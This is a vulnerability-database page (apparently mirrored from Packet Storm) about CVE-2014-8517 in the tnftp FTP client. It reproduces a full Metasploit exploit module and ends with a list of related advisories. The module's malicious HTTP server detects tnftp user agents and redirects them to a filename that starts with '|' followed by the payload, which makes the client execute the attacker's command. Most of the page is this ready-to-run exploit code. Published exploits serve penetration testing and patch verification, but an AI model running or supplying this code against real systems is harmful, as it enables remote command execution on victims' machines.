Lucene search
WvuPACKETSTORM:144874HistoryNov 03, 2017 - 12:00 a.m.
tnftp "savefile" Arbitrary Command Execution
2017-11-0300:00:00
wvu
packetstormsecurity.com
27
0.959 High
EPSS
Percentile
99.5%
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'tnftp "savefile" Arbitrary Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in
tnftp's handling of the resolved output filename - called "savefile" in
the source - from a requested resource.
If tnftp is executed without the -o command-line option, it will resolve
the output filename from the last component of the requested resource.
If the output filename begins with a "|" character, tnftp will pass the
fetched resource's output to the command directly following the "|"
character through the use of the popen() function.
},
'Author' => [
'Jared McNeill', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
['CVE', '2014-8517'],
['URL', 'http://seclists.org/oss-sec/2014/q4/459']
],
'DisclosureDate' => 'Oct 28 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {'BadChars' => '/'},
'Targets' => [['ftp(1)', {}]],
'DefaultTarget' => 0
))
end
def on_request_uri(cli, request)
unless request['User-Agent'] =~ /(tn|NetBSD-)ftp/
print_status("#{request['User-Agent']} connected")
send_not_found(cli)
return
end
if request.uri.ends_with?(sploit)
send_response(cli, '')
print_good("Executing `#{payload.encoded}'!")
report_vuln(
:host => cli.peerhost,
:name => self.name,
:refs => self.references,
:info => request['User-Agent']
)
else
print_status("#{request['User-Agent']} connected")
print_status('Redirecting to exploit...')
send_redirect(cli, sploit_uri)
end
end
def sploit_uri
(get_uri.ends_with?('/') ? get_uri : "#{get_uri}/") +
Rex::Text.uri_encode(sploit, 'hex-all')
end
def sploit
"|#{payload.encoded}"
end
end
`
Related
ubuntucve
ubuntucve
CVE-2014-8517
2014-11-17 00:00:00
zdt
zdt
tnftp (savefile) Arbitrary Command Execution Exploit
2017-11-03 00:00:00
tnftp - clientside BSD Exploit
2014-12-16 00:00:00
tnftp "savefile" Arbitrary Command Execution Exploit
2014-11-10 00:00:00
gentoo
gentoo
tnftp: Arbitrary code execution
2016-11-15 00:00:00
securityvulns
securityvulns
FreeBSd ftp code execution
2014-11-10 00:00:00
FreeBSD Security Advisory FreeBSD-SA-14:26.ftp
2014-11-10 00:00:00
APPLE-SA-2015-01-27-4 OS X 10.10.2 and Security Update 2015-001
2015-02-02 00:00:00
exploitpack
exploitpack
tnftp (FreeBSD 8910) - tnftp Client Side
2014-12-02 00:00:00
freebsd_advisory
freebsd_advisory
FreeBSD-SA-14:26.ftp
2014-11-04 00:00:00
cve
cve
CVE-2014-8517
2014-11-17 16:59:05
nessus
nessus
Fedora 20 : tnftp-20141031-1.fc20 (2014-14113)
2014-11-12 00:00:00
openSUSE Security Update : tnftp (openSUSE-SU-2014:1383-1)
2014-11-11 00:00:00
nvd
nvd
CVE-2014-8517
2014-11-17 16:59:05
debiancve
debiancve
CVE-2014-8517
2014-11-17 16:59:05
prion
prion
Open redirect
2014-11-17 16:59:00
freebsd
freebsd
FreeBSD -- Remote command execution in ftp(1)
2014-11-04 00:00:00
checkpoint_advisories
checkpoint_advisories
NetBSD tnftp fetch.c fetch_url Command Execution (CVE-2014-8517)
2014-11-16 00:00:00
fedora
fedora
[SECURITY] Fedora 20 Update: tnftp-20141031-1.fc20
2014-11-12 02:34:33
archlinux
archlinux
tnftp: arbitrary command execution
2014-11-01 00:00:00
openvas
openvas
Fedora Update for tnftp FEDORA-2014-14113
2014-11-12 00:00:00
cvelist
cvelist
CVE-2014-8517
2014-11-17 16:00:00
exploitdb
exploitdb
tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side
2014-12-02 00:00:00